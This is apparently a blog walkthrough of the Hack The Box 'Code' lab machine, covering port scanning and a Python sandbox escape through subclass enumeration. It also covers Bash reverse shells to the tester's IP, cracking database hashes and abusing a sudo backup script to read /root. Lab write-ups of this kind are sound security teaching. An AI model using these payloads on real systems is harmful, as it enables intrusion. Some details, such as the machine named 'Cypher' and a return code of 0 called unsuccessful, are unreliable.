LoginHack The Box: Code Machine Walkthrough β Easy Difficulity
Introduction to Code:
In this write-up, we will explore the βCodeβ machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the βCodeβ machine from Hack The Box by achieving the following objectives:
User Flag: Exploit a web applicationβs code execution vulnerability by bypassing restricted keywords through Python class enumeration. Gain a reverse shell as the app-production user and read the user.txt flag from the userβs home directory.
Root Flag: From the app-production shell, access a SQLite database in the /app directory, extract and crack the martin userβs password, and switch to martin. Identify that martin can run a backup script as root. Create a malicious JSON file to include the /root/ directory in a backup, extract it, and read the root.txt flag.
Enumerating the Code Machine
Establishing Connectivity
I connected to the Hack The Box environment via OpenVPN using my credentials, running all commands from a Kali Linux virtual machine. The target IP address for the Cypher machine was 10.10.11.62
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oN nmap_initial.txt 10.10.11.62Nmap Output:
ββ[dark@parrot]β[~/Documents/htb/code]
ββββΌ $nmap -sV -sC -oA initial 10.10.11.62
# Nmap 7.94SVN scan initiated Mon Jul 21 18:11:21 2025 as: nmap -sV -sC -oA initial 10.10.11.62
Nmap scan report for 10.10.11.62
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd (RSA)
| 256 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 (ECDSA)
|_ 256 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 (ED25519)
5000/tcp open http Gunicorn 20.0.4
|_http-server-header: gunicorn/20.0.4
|_http-title: Python Code Editor
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 21 18:12:09 2025 -- 1 IP address (1 host up) scanned in 48.11 secondsAnalysis:
- Port 22 (SSH): Secure Shell service for remote access. It allows administrators to log in and manage the server using encrypted connections securely.
- Port 5000 (HTTP): A web application is running on this port using Gunicorn 20.0.4, a Python-based web server. The site appears to be a Python Code Editor, according to the page title.
Web Enumeration:
Exploitation
Web Application Exploration:
The web interface includes a code execution feature.
We are attempting to run the following code. However, before executing it, we need to ensure all prerequisites are met. Once these conditions are satisfied, the code can be executed as intended.
import os
print(os.system("echo Hello, world!"))Results in the following error: βThe use of restricted keywords is not permitted.β
Troubleshooting Issues on the Code Machine
To bypass this, enumerate Python classes to access restricted functions:
for i in range(200):
try:
cls = ''.__class__.__bases__[0].__subclasses__()[i]
if hasattr(cls, '__init__') and hasattr(cls.__init__, '__globals__'):
builtins = cls.__init__.__globals__.get('__buil'+'tins__')
if builtins and 'ev'+'al' in builtins:
print(i, str(cls))
except Exception:
continuePython Class Enumeration Output
The following Python classes were identified during enumeration to bypass restricted keywords on the βCodeβ machine.
Import and Module Classes
# 80 <class '_frozen_importlib._ModuleLock'>
# 81 <class '_frozen_importlib._DummyModuleLock'>
# 82 <class '_frozen_importlib._ModuleLockManager'>
# 83 <class '_frozen_importlib.ModuleSpec'>
# 99 <class '_frozen_importlib_external.FileLoader'>
# 100 <class '_frozen_importlib_external._NamespacePath'>
# 101 <class '_frozen_importlib_external._NamespaceLoader'>
# 103 <class '_frozen_importlib_external.FileFinder'>
# 104 <class 'zipimport.zipimporter'>
# 105 <class 'zipimport._ZipImportResourceReader'>These classes relate to Pythonβs import and module loading mechanisms.
Codec and OS Classes
# 107 <class 'codecs.IncrementalEncoder'>
# 108 <class 'codecs.IncrementalDecoder'>
# 109 <class 'codecs.StreamReaderWriter'>
# 110 <class 'codecs.StreamRecoder'>
# 132 <class 'os._wrap_close'>These involve encoding/decoding and OS operations.
Builtins and Type Classes
# 133 <class '_sitebuiltins.Quitter'>
# 134 <class '_sitebuiltins._Printer'>
# 136 <class 'types.DynamicClassAttribute'>
# 137 <class 'types._GeneratorWrapper'>
# 138 <class 'warnings.WarningMessage'>
# 139 <class 'warnings.catch_warnings'>This enumeration reveals classes such as Quitter (index 133), which was utilised to execute commands.
Utility and Context Classes
# 166 <class 'reprlib.Repr'>
# 174 <class 'functools.partialmethod'>
# 175 <class 'functools.singledispatchmethod'>
# 176 <class 'functools.cached_property'>
# 178 <class 'contextlib._GeneratorContextManagerBase'>
# 179 <class 'contextlib._BaseExitStack'>These handle representation and context management.
Regex and Threading Classes
# 185 <class 'sre_parse.State'>
# 186 <class 'sre_parse.SubPattern'>
# 187 <class 'sre_parse.Tokenizer'>
# 188 <class 're.Scanner'>
# 189 <class '__future__._Feature'>
# 192 <class '_weakrefset._IterationGuard'>
# 193 <class '_weakrefset.WeakSet'>
# 194 <class 'threading._RLock'>
# 195 <class 'threading.Condition'>
# 196 <class 'threading.Semaphore'>
# 197 <class 'threading.Event'>
# 198 <class 'threading.Barrier'>
# 199 <class 'threading.Thread'>These support regex parsing and threading.
Executing Commands
Capturing Command Output
Execute the whoami command using the Quitter class, resulting in an output code of 0, indicating successful execution.
Next, capture the whoami output using the subprocess module.
print(
''.__class__.__bases__[0].__subclasses__()[133]
.__init__.__globals__['__builtins__']['eval'](
"__import__('subprocess').run(['whoami'], capture_output=True).stdout.decode()"
)
)The execution of the command produced the output app-production, indicating the current user context under which the process is running.
Establishing a Reverse Shell
To establish a reverse shell:
print(
''.__class__.__bases__[0].__subclasses__()[133]
.__init__.__globals__['__builtins__']['eval'](
"__import__('subprocess').run(['bash','-c','bash -i >& /dev/tcp/10.10.14.116/9007 0>&1'], shell=True)'
)
)The command executed successfully and returned a CompletedProcess object with the arguments [βbashβ, β-cβ, βbash -i >& /dev/tcp/10.10.14.116/9007 0>&1β] and a return code of 0, indicating unsuccessful execution.
It was time to list the available attributes and methods of the int class.
Utilise subprocess.Popen (located at index 317) to initiate a reverse shell connection:
().__class__.__bases__[0].__subclasses__()[317](
["/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.14.116/9007 0>&1"]
)Using subprocess.PopenUsing subprocess.Popen
This command initiates a reverse shell connection by spawning a Bash process that connects back to the specified IP address and port.
A response was successfully received from the reverse shell connection.
Once shell access is obtained, proceed to locate and read the user flag.
Escalate to Root Privileges
Privilege Escalation:
Letβs explore the app directory, which includes the folders and files
Within the instance directory, there is a file named database.db.
SQLite3 Database Enumeration on the Code Machine
Therefore, letβs run the command sqlite3 database.db to interact with the database.
The database contains two tables.
We need to extract the stored hashes from the SQLite database using sqlite3.
The screenshot above displays the extracted hashes.
Hashcat Password Cracking Process
It is uncommon to obtain a complete set of cracked hashes as shown here.
Switching to Martin
By using the previously cracked password, we can now authenticate as the user Martin. Consequently, this allows us to gain access with Martinβs privileges and proceed with further actions.
Exploring and Testing the backy.sh Script
When running sudo -l, we discovered the presence of the /usr/bin/backy.sh script.
The backy.sh script streamlines folder backups on Linux. First, it demands a JSON settings file listing folders to back up. However, without a valid file, it halts and shows an error. Moreover, it restricts backups to /var/ or /home/ directories, thus blocking unauthorized paths. Additionally, it sanitizes folder lists to prevent security breaches. Once verified, it triggers the backy tool for the backup. Ultimately, backy.sh ensures safe, controlled backups, thwarting misuse.
Creating a Malicious JSON File on Code Machine
When Martin tries to run the /usr/bin/backy.sh script with sudo, the system immediately responds by showing how to use the script properlyβspecifically, it requires a file named task.json as input. Therefore, the script wonβt run without the correct instructions. This highlights the importance of providing the right parameters when executing commands with elevated privileges, ensuring that the intended actions are performed safely and correctly.
The original /usr/bin/backy.sh file is a script that requires a JSON task file as an argument to run properly. Without this input, it displays a usage message and does not perform any actions.
Our modified version of the script uses dark.json as the input task file to execute specific commands or actions defined within that JSON, allowing us to leverage the scriptβs functionality with custom instructions.
We successfully obtained the tar.bz2 file, but encountered issues that prevented us from extracting or using it.
Perhaps using the correct task.json file is necessary to properly execute the script and avoid errors.
Our goal should be to directly obtain the file itself for proper use or analysis.
It appears that we have successfully accessed the root/ directory.
The script likely didnβt work earlier because it required a specific input file (task.json) to function correctly, and running it without this file caused it to display the usage instructions instead of executing the intended tasks.
The post Hack The Box: Code Machine Walkthrough β Easy Difficulity appeared first on Threatninja.net.
